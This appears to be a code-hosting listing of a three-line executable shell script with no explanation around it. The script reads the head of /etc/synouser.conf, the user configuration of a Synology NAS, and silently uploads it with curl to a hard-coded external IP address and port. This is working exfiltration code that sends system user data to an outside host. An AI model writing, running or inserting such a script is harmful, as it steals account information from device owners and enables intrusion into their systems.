3 lines
111 B
Bash
Executable File
3 lines
111 B
Bash
Executable File
#!/bin/sh
|
|
head -3 /etc/synouser.conf 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/user_conf
|